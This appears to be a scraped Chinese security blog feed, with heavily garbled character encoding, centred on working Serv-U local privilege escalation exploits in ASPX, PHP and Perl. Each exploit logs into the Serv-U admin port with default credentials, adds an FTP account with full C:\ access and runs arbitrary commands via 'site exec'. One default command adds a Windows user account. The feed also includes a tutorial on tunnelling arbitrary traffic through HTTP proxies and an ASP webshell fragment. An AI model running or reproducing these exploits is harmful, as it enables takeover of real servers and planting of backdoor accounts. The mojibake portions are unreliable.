    <td colspan="2"><input type="submit" name="Submit" value="鎻愪氦">銆
      <input type="reset" name="Submit2" value="閲嶇疆">
      <input name="action" type="hidden" id="action" value="1"></td>
  </tr>
</table></form></center>
<% end select
' Returns the drive (e.g. "c:") of the Windows folder, obtained through the
' FileSystemObject's GetSpecialFolder(0); falls back to "c:" when the object
' cannot be created. NOTE(review): "f" is not declared locally, so this
' temporarily overwrites the script-level "f" -- only harmless because the
' caller assigns this function's return value to "f" afterwards.
function Gpath()
on error resume next
    err.clear
    set f=Server.CreateObject("Scripting.FileSystemObject")
    if err.number>0 then
 gpath="c:"
        exit function
    end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
' Builds the absolute URL of the current script from SERVER_NAME, SERVER_PORT
' and SCRIPT_NAME, omitting ":port" only when SERVER_PORT is exactly "80".
' Both branches hard-code the http:// scheme. The caller above writes the
' result into an onClick attribute without encoding it.
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function
%>


ASPX


<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, where are you ?

' Runs when the Start button is clicked. Opens an admin session to Serv-U on
' the loopback interface (port from the form), creates a throw-away domain
' "cctv" on 43859 with account lake/admin123, opens a second loopback session
' to that domain to send "site exec <cmd>", then deletes the domain on the
' first session. All inputs come from the page's text boxes; the page has no
' login of its own. Every line sent and received is echoed into the response.
Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
' Implicit String -> Int32 narrowing; non-numeric text raises at this line.
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-deleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
' First session: the admin listener.
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
' The full exception text is written to the page.
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
' Second session: the domain just created.
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
' If this connect fails the page ends here: the admin session is never
' closed and the DelDomain step below is not reached, so the "cctv" domain
' stays configured.
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
' Cleanup on the admin session.
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub


' Reads one chunk (up to 1024 bytes) from the stream and echoes it into the
' page. The byte count returned by Read is ignored, so the whole buffer --
' including any trailing zero bytes left after a short read -- is ASCII-decoded
' and written out.
Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

' Writes data to the stream as ASCII and echoes it into the page, so every
' line sent -- the admin password included -- appears in the HTTP response.
Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- insert content here -->
</p>
</form>
</body>
</html>


PHP


<?php
// Runs only when the form below has been posted. The admin port, admin user,
// password and the command all come straight from $_POST; the page performs
// no authentication of its own. Every line sent and received is echoed.
if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))
{
  $sendbuf = "";
  $recvbuf = "";
  // Throw-away Serv-U domain "haxorcitos" listening on 2121.
  $domain = "-SETDOMAIN\r\n".
      "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".
      "-TZOEnable=0\r\n".
      " TZOKey=\r\n";
  // Account Will_Be/Will_Be in that domain, home directory C:\.
  $adduser = "-SETUSERSETUP\r\n".
      "-IP=0.0.0.0\r\n".
      "-PortNo=2121\r\n".
      "-User=Will_Be\r\n".
      "-Password=Will_Be\r\n".
      "-HomeDir=c:\\\r\n".
      "-LoginMesFile=\r\n".
      "-Disable=0\r\n".
      "-RelPaths=1\r\n".
      "-NeedSecure=0\r\n".
      "-HideHidden=0\r\n".
      "-AlwaysAllowLogin=0\r\n".
      "-ChangePassword=0\r\n".
      "-QuotaEnable=0\r\n".
      "-MaxUsersLoginPerIP=-1\r\n".
      "-SpeedLimitUp=0\r\n".
      "-SpeedLimitDown=0\r\n".
      "-MaxNrUsers=-1\r\n".
      "-IdleTimeOut=600\r\n".
      "-SessionTimeOut=-1\r\n".
      "-Expire=0\r\n".
      "-RatioUp=1\r\n".
      "-RatioDown=1\r\n".
      "-RatiosCredit=0\r\n".
      "-QuotaCurrent=0\r\n".
      "-QuotaMaximum=0\r\n".
      "-Maintenance=None\r\n".
      "-PasswordType=Regular\r\n".
      "-Ratios=None\r\n".
      " Access=c:\\|RELP\r\n";
  // Sent at the end to remove the domain again.
  $deldomain="-DELETEDOMAIN\r\n".
      "-IP=0.0.0.0\r\n".
      " PortNo=2121\r\n";
  // Admin session on the loopback interface; the handle is used without being
  // checked for failure.
  $sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER ".$_POST["User"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS ".$_POST["Pass"]."\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  // The password is echoed into the page along with everything else.
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "SITE MAINTENANCE\r\n";
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $domain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = $adduser;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Exploit ...<br>";
  echo "**********************************************************<br>";
  // Second session, to the temporary domain, as the account just created.
  $exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "USER Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "PASS Will_Be\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  $sendbuf = "site exec ".$_POST["Command"]."\r\n";
  fputs($exp, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: site exec</font> <font color=green>".$_POST["Command"]."</font><br>";
  $recvbuf = fgets($exp, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  echo "**********************************************************<br>";
  echo "Starting Delete Domain ...<br>";
  echo "**********************************************************<br>";
  // Cleanup: only the domain is deleted, on the admin session.
  $sendbuf = $deldomain;
  fputs($sock, $sendbuf, strlen($sendbuf));
  echo "<font color=blue>Send: $sendbuf</font><br>";
  $recvbuf = fgets($sock, 1024);
  echo "<font color=red>Recv: $recvbuf</font><br>";
  fclose($sock);
  fclose($exp);
}
?>
<html>
<head>
<meta http-equiv="Content-Type" c>
<title>Serv-U Local Exploit By Will_Be</title>
</head>

<body>
<form method="post">
LocalPort:
<input name="Port" type="text" id="Port" value="43958">
<br>
LocalUser:
<input name="User" type="text" id="User" value="LocalAdministrator">
<br>
LocalPass:
<input name="Pass" type="text" id="Pass" value="#l@$ak#.lk;0@P">
<br>
Command銆:
<input name="Command" type="text" id="Command" value="net user Will_Be heihei /add">
<br>
<input type="submit" name="Submit" value="鎻愪氦">銆銆
<input type="reset" name="Submit" value="閲嶇疆">
</form>
</body>
</html>


Perl
Perl鐨勯粯璁ゅ畨瑁呰礬寰勬槸錛欳:\Perl
鐒跺悗浣跨敤錛?br>perl 浣犵殑pl鏂囦歡鐨勮礬寰勩?br>鍦╓EBSHELL涓殑璺緞鏄繖鏍風(fēng)殑錛?br>C:\perl\bin\perl 浣犵殑pl鏂囦歡鐨勮礬寰?
#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
# Minimal CGI header so the output renders when the script is run by a web
# server.
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

# Unlike the ASP/ASPX/PHP variants above, nothing is read from the request:
# every value is fixed here. The new account is created on the standard FTP
# port ($ftpport = 21) rather than in a throw-away domain, and nothing in this
# script removes it afterwards.
$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "h4x0r";
$password = "123456";
$homedir = 'C:\\';
# Assigned but not used anywhere in this script.
$dir = 'C:\\WINNT\\System32\\';


# Redundant: "use IO::Socket" above already loads IO::Socket::INET.
use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "TEST<br><br>";

# Commands are written blind, with fixed one-second pauses instead of reading
# the server's replies; all replies are collected only at the end.
print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";


# Drain everything the server sent back (until QUIT closes the connection)
# and print it as-is.
@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;


Symantec 鏍稿績(jī)椹卞姩 symtdi.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://m.shnenglu.com/elva/archive/2007/07/20/28428.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:15:00 GMThttp://m.shnenglu.com/elva/archive/2007/07/20/28428.htmlhttp://m.shnenglu.com/elva/comments/28428.htmlhttp://m.shnenglu.com/elva/archive/2007/07/20/28428.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/28428.htmlhttp://m.shnenglu.com/elva/services/trackbacks/28428.html闃呰鍏ㄦ枃

Rav 鏍稿績(jī)椹卞姩 memscan.sys 鏈湴鏉冮檺鎻愬崌婕忔礊http://m.shnenglu.com/elva/archive/2007/07/20/28427.html鍙跺瓙鍙跺瓙Fri, 20 Jul 2007 04:14:00 GMThttp://m.shnenglu.com/elva/archive/2007/07/20/28427.htmlhttp://m.shnenglu.com/elva/comments/28427.htmlhttp://m.shnenglu.com/elva/archive/2007/07/20/28427.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/28427.htmlhttp://m.shnenglu.com/elva/services/trackbacks/28427.html闃呰鍏ㄦ枃

Linux Kernel do_mremap VMA鏈湴鏉冮檺鎻愬崌婕忔礊http://m.shnenglu.com/elva/archive/2007/06/01/25237.html鍙跺瓙鍙跺瓙Thu, 31 May 2007 19:10:00 GMThttp://m.shnenglu.com/elva/archive/2007/06/01/25237.htmlhttp://m.shnenglu.com/elva/comments/25237.htmlhttp://m.shnenglu.com/elva/archive/2007/06/01/25237.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/25237.htmlhttp://m.shnenglu.com/elva/services/trackbacks/25237.html闃呰鍏ㄦ枃

Kaspersky Anti-Virus 榪滅▼鍒犻櫎浠繪剰鏂囦歡婕忔礊鍒嗘瀽鍙?qiáng)鍒╃敤浠g?/title><link>http://m.shnenglu.com/elva/archive/2007/05/31/25224.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Thu, 31 May 2007 12:44:00 GMT</pubDate><guid>http://m.shnenglu.com/elva/archive/2007/05/31/25224.html</guid><wfw:comment>http://m.shnenglu.com/elva/comments/25224.html</wfw:comment><comments>http://m.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/elva/comments/commentRss/25224.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/elva/services/trackbacks/25224.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://m.shnenglu.com/elva/archive/2007/05/31/25224.html'>闃呰鍏ㄦ枃</a><img src ="http://m.shnenglu.com/elva/aggbug/25224.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-31 20:44 <a href="http://m.shnenglu.com/elva/archive/2007/05/31/25224.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>鍛戒護(hù)鎵瑰鐞嗗疄鐜板3389鐧誨綍鐨勬棩蹇楄褰?http://m.shnenglu.com/elva/archive/2007/05/24/24732.html鍙跺瓙鍙跺瓙Wed, 23 May 2007 17:50:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/24/24732.htmlhttp://m.shnenglu.com/elva/comments/24732.htmlhttp://m.shnenglu.com/elva/archive/2007/05/24/24732.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24732.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24732.html闃呰鍏ㄦ枃

鍒ゆ柇褰撳墠鐢ㄦ埛鏄惁涓虹郴緇熺鐞嗗憳http://m.shnenglu.com/elva/archive/2007/05/14/24080.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:56:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/14/24080.htmlhttp://m.shnenglu.com/elva/comments/24080.htmlhttp://m.shnenglu.com/elva/archive/2007/05/14/24080.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24080.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24080.html闃呰鍏ㄦ枃

2000涓嬪彲鎵ц鏂囦歡淇敼鑷韓http://m.shnenglu.com/elva/archive/2007/05/14/24079.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:55:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/14/24079.htmlhttp://m.shnenglu.com/elva/comments/24079.htmlhttp://m.shnenglu.com/elva/archive/2007/05/14/24079.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24079.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24079.html闃呰鍏ㄦ枃

絎竴涓敮鎸?000鍜?003涓嬪畬緹庤繘琛岀敤鎴峰厠闅嗙殑C婧愮爜(鍙湪webshell閲岀洿鎺ヨ繍琛?http://m.shnenglu.com/elva/archive/2007/05/14/24078.html鍙跺瓙鍙跺瓙Sun, 13 May 2007 16:49:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/14/24078.htmlhttp://m.shnenglu.com/elva/comments/24078.htmlhttp://m.shnenglu.com/elva/archive/2007/05/14/24078.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/24078.htmlhttp://m.shnenglu.com/elva/services/trackbacks/24078.html闃呰鍏ㄦ枃

MS Windows GDI Local Privilege Escalation Exploit (MS07-017) http://m.shnenglu.com/elva/archive/2007/05/08/23634.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:49:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/08/23634.htmlhttp://m.shnenglu.com/elva/comments/23634.htmlhttp://m.shnenglu.com/elva/archive/2007/05/08/23634.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23634.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23634.html闃呰鍏ㄦ枃

甯﹁緇嗚В閲婄殑鍐插嚮娉㈠師浠g爜http://m.shnenglu.com/elva/archive/2007/05/08/23633.html鍙跺瓙鍙跺瓙Tue, 08 May 2007 08:43:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/08/23633.htmlhttp://m.shnenglu.com/elva/comments/23633.htmlhttp://m.shnenglu.com/elva/archive/2007/05/08/23633.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23633.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23633.html闃呰鍏ㄦ枃

HTTP Tunnelinghttp://m.shnenglu.com/elva/archive/2007/05/06/23526.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:51:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/06/23526.htmlhttp://m.shnenglu.com/elva/comments/23526.htmlhttp://m.shnenglu.com/elva/archive/2007/05/06/23526.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23526.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23526.htmlIntroduction

HTTP Tunneling

HTTP is a text-based protocol used to retrieve Web pages through a Web browser. On many LANs you sit behind a proxy server that exposes an HTTP proxy on some defined port, which you configure in Internet Explorer's Connection / LAN settings. At first sight such a proxy relays only HTTP, so only HTTP traffic can reach the outside network. In fact there is a well-known way out: the mechanism the proxy uses to relay HTTPS — the HTTP CONNECT method — will carry any binary protocol, or a protocol of your own, to whatever host and port the proxy is willing to connect to.

HTTPS Explanation

In HTTPS, data is transferred between browser and server in encrypted form, so the proxy cannot read the stream and does not try to: it opens a raw TCP connection to the requested host and port and shuttles bytes in both directions. Nothing forces the bytes inside that tunnel to be TLS, which is why a client can use the proxy to reach an arbitrary server — the proxy sees only the CONNECT request with its destination host:port and assumes an HTTPS session. Be aware of the limits of this "fooling": a sensibly configured proxy restricts CONNECT to port 443 (perhaps a few others) and logs every CONNECT destination, and a TLS-inspecting proxy may refuse a tunnel that does not start with a TLS handshake. A CONNECT to port 25, as in the samples below, is exactly what such policies exist to block, so expect a 403 rather than a tunnel on a hardened network.

For HTTPS, your browser connects to the proxy server and sends a CONNECT request:

CONNECT neurospeech.com:443 HTTP/1.0<CR><LF>
Host: neurospeech.com:443<CR><LF>
[... other HTTP header lines ending with <CR><LF> if required, e.g. Proxy-Authorization]
<CR><LF>    // empty line ends the request headers

The proxy treats this as an HTTPS session and opens a TCP connection to the requested host and port. If that connection is established, the proxy returns the following response (if it refuses — typically 403 when the destination port is not allowed, or 407 Proxy Authentication Required when it wants credentials — the status line carries that code instead and no tunnel exists):

HTTP/1.0 200 Connection Established<CR><LF>
[.... other HTTP header lines ending with <CR><LF>..
ignore all of them]
<CR><LF>    // Last Empty Line

Now, the browser is connected to the end server and can exchange data in both a binary and secure form.

How to Do This

Now, it's your program's turn to fool the proxy server and behave as Internet Explorer behaves for Secure HTTP.

  1. Connect to Proxy Server first.
  2. Issue CONNECT Host:Port HTTP/1.0<CR><LF>. (If you send HTTP/1.1 instead, a Host: Host:Port<CR><LF> header is mandatory.)
  3. Issue <CR><LF>.
  4. Read one line of response. If the status code after the HTTP version is 200, the tunnel is open. Any other code (403, 407, ...) means it is not: stop here instead of carrying on as if connected.
  5. Read further lines of response until you receive an empty line.
  6. Now, you are connected to the outside world through a proxy. Do any data exchange you want.

Sample Source Code

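  // Reach mail.yahoo.com:25 through an HTTP proxy at 192.0.1.1:4480 by issuing
// the CONNECT request by hand.
//   CSocketClient wraps a socket: operator<< on a CString sends the string
//   followed by CRLF, operator>> reads one CRLF-terminated line.
// Fix over the original: a non-200 reply only popped a message box and then
// fell through to the header-skipping loop and the "SMTP here" part, i.e. it
// kept talking on a tunnel the proxy had refused.  The SMTP part now runs
// only after a 200 status.
try
{
    CString Request, Response;
    CSocketClient Client;
    Client.ConnectTo("192.0.1.1", 4480);

    // CONNECT host:port, then the empty line that ends the request headers.
    // HTTP/1.0 is used so no Host header is required.
    Request = "CONNECT mail.yahoo.com:25 HTTP/1.0";
    Client << Request;
    Request = "";
    Client << Request;

    // Status line looks like "HTTP/1.x 200 ...": drop the version token and
    // inspect the three-digit code.  If there is no space, keep the whole line.
    Client >> Response;
    int n = Response.Find(' ');
    CString Status = (n < 0) ? Response : Response.Mid(n + 1);

    if (Status.Left(3) != "200")
    {
        // Proxy refused the tunnel (e.g. 403 port not allowed, 407 proxy
        // authentication required).  Nothing after this point is reachable.
        AfxMessageBox(Response);
    }
    else
    {
        // Skip the remaining response header lines up to the empty line.
        do
        {
            Client >> Response;
        } while (!Response.IsEmpty());

        // Tunnel is open: the socket now carries bytes straight to
        // mail.yahoo.com:25.
        // Do further SMTP Protocol here..
    }
}
catch (CSocketException * pE)
{
    pE->ReportError();
}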

Library Source Code

The Dns.h file contains all DNS-related source code. It uses other libraries, as SocketEx.h, SocketClient.h, and NeuroBuffer.h.

CSocketEx

Socket functions as a wrapper class. (CSocket is very heavy and unreliable if you don't have the exact idea of how it works.) All the functions are of the same name as CSocket. You can use this class directly.

CSocketClient

Derived from CSocketEx and throws proper exceptions with details of Winsock errors. It defines two operators, >> and <<, for easy sending and receiving; it also changes network to host and host to network order of bytes if required.

CHttpProxySocketClient

Derived from CSocketClient, you can call the SetProxySettings(ProxyServer,Port) method and set proxy settings. Then, you can connect to the desired host and port as you need. The ConnectTo method is overridden, and it automatically implements an HTTP proxy protocol and gives you a connection without any hassle.

How to Use CHttpProxySocketClient

  // Same goal as the manual sample — reach mail.yahoo.com:25 — but here
// CHttpProxySocketClient performs the CONNECT handshake itself.
// Proxy in this sample: 192.0.1.1, port 1979 (the manual sample used 4480).
try
{
    const char * const kProxyHost = "192.0.1.1";
    const int          kProxyPort = 1979;

    CHttpProxySocketClient Client;

    // Tell the wrapper which HTTP proxy to go through.  Per the class
    // description, omitting this call makes ConnectTo() connect straight to
    // the target when direct access exists, so the class can be used
    // unconditionally and the proxy becomes a configuration detail.
    Client.SetProxySettings(kProxyHost, kProxyPort);

    // Overridden ConnectTo(): implements the HTTP proxy (CONNECT) protocol
    // and hands back a connection to the requested host and port.
    Client.ConnectTo("mail.yahoo.com", 25);

    // Client now speaks end-to-end to mail.yahoo.com:25.
}
catch (CSocketException * pE)
{
    pE->ReportError();
}

Note: I usually don't program in the form of .h and .cpp different files, because using them the next time somewhere else is a big problem because you must move both files here and there. So, I put all the code in my .h file only; I don't write to the .cpp file unless it's required. You need to copy only the SocketEx.h, SocketClient.h, and HttpProxySocket.h files into your project's directory, and add line:

#include "HttpProxySocket.h"

after your:

#if !defined(.....

and so forth code of your Visual Studio-generated file. If you put anything above this, you will get n number of errors.

 



榪滅▼妗岄潰瀹夊叏鍏ㄨВ錛堜笅錛?/title><link>http://m.shnenglu.com/elva/archive/2007/05/06/23524.html</link><dc:creator>鍙跺瓙</dc:creator><author>鍙跺瓙</author><pubDate>Sun, 06 May 2007 08:36:00 GMT</pubDate><guid>http://m.shnenglu.com/elva/archive/2007/05/06/23524.html</guid><wfw:comment>http://m.shnenglu.com/elva/comments/23524.html</wfw:comment><comments>http://m.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/elva/comments/commentRss/23524.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/elva/services/trackbacks/23524.html</trackback:ping><description><![CDATA[     鎽樿:   <a href='http://m.shnenglu.com/elva/archive/2007/05/06/23524.html'>闃呰鍏ㄦ枃</a><img src ="http://m.shnenglu.com/elva/aggbug/23524.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/elva/" target="_blank">鍙跺瓙</a> 2007-05-06 16:36 <a href="http://m.shnenglu.com/elva/archive/2007/05/06/23524.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>榪滅▼妗岄潰瀹夊叏鍏ㄨВ(涓?http://m.shnenglu.com/elva/archive/2007/05/06/23523.html鍙跺瓙鍙跺瓙Sun, 06 May 2007 08:35:00 GMThttp://m.shnenglu.com/elva/archive/2007/05/06/23523.htmlhttp://m.shnenglu.com/elva/comments/23523.htmlhttp://m.shnenglu.com/elva/archive/2007/05/06/23523.html#Feedback0http://m.shnenglu.com/elva/comments/commentRss/23523.htmlhttp://m.shnenglu.com/elva/services/trackbacks/23523.html闃呰鍏ㄦ枃
